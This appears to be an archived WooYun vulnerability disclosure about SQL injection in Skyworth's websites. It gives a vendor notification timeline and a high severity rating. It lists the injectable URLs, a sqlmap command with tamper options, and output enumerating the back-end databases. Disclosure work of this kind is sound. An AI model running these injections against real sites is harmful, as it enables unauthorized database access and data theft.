乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-31: 细节已通知厂商并且等待厂商处理中 2015-11-04: 厂商已经确认,细节仅向厂商公开 2015-11-14: 细节向核心白帽子及相关领域专家公开 2015-11-24: 细节向普通白帽子公开 2015-12-04: 细节向实习白帽子公开 2015-12-19: 细节向公众公开
创维 大厂商吧
注入点打包:
http://www.iskyworth.com/ashx/productseach.ashx?TypeId= http://www.iskyworth.com/ashx/downlist.ashx?local=0&cid= http://www.skyworth.com.ph/ashx/productseach.ashx?TypeId= http://www.skyworth.com.ph/ashx/downlist.ashx?local=0&cid=
注入点测试:
http://www.iskyworth.com/ashx/productseach.ashx?TypeId=
sqlmap.py -u "http://www.iskyworth.com/ashx/productseach.ashx?TypeId=" --tamper=space2comment,between --dbs
GET parameter 'TypeId' is vulnerable. Do you want to keep testing the others (if any)? [y/N]sqlmap identified the following injection point(s) with a total of 65 HTTP(s) requests:---Parameter: TypeId (GET) Type: inline query Title: Microsoft SQL Server/Sybase inline queries Payload: TypeId=(SELECT CHAR(113)+CHAR(118)+CHAR(106)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (3158=3158) THEN CHAR(49) ELSE CHAR(---[16:08:14] [WARNING] changes made by tampering scripts are not included in shown payload content(s)[16:08:14] [INFO] testing Microsoft SQL Server[16:08:15] [INFO] confirming Microsoft SQL Server[16:08:18] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008[16:08:18] [INFO] fetching database names[16:08:18] [INFO] the SQL query used returns 14 entries[16:08:19] [INFO] retrieved: au[16:08:19] [INFO] retrieved: hk[16:08:20] [INFO] retrieved: master[16:08:20] [INFO] retrieved: model[16:08:21] [INFO] retrieved: msdb[16:08:21] [INFO] retrieved: skyworth[16:08:22] [INFO] retrieved: skyworthau[16:08:22] [INFO] retrieved: skyworthhk[16:08:23] [INFO] retrieved: skyworthid[16:08:23] [INFO] retrieved: skyworthin[16:08:24] [INFO] retrieved: skyworthph[16:08:24] [INFO] retrieved: skyworthth[16:08:25] [INFO] retrieved: skyworthvn[16:08:25] [INFO] retrieved: tempdbavailable databases [14]:[*] au[*] hk[*] master[*] model[*] msdb[*] skyworth[*] skyworthau[*] skyworthhk[*] skyworthid[*] skyworthin[*] skyworthph[*] skyworthth[*] skyworthvn[*] tempdb
数据库:
过滤参数
危害等级:高
漏洞Rank:10
确认时间:2015-11-04 12:12
谢谢支持
暂无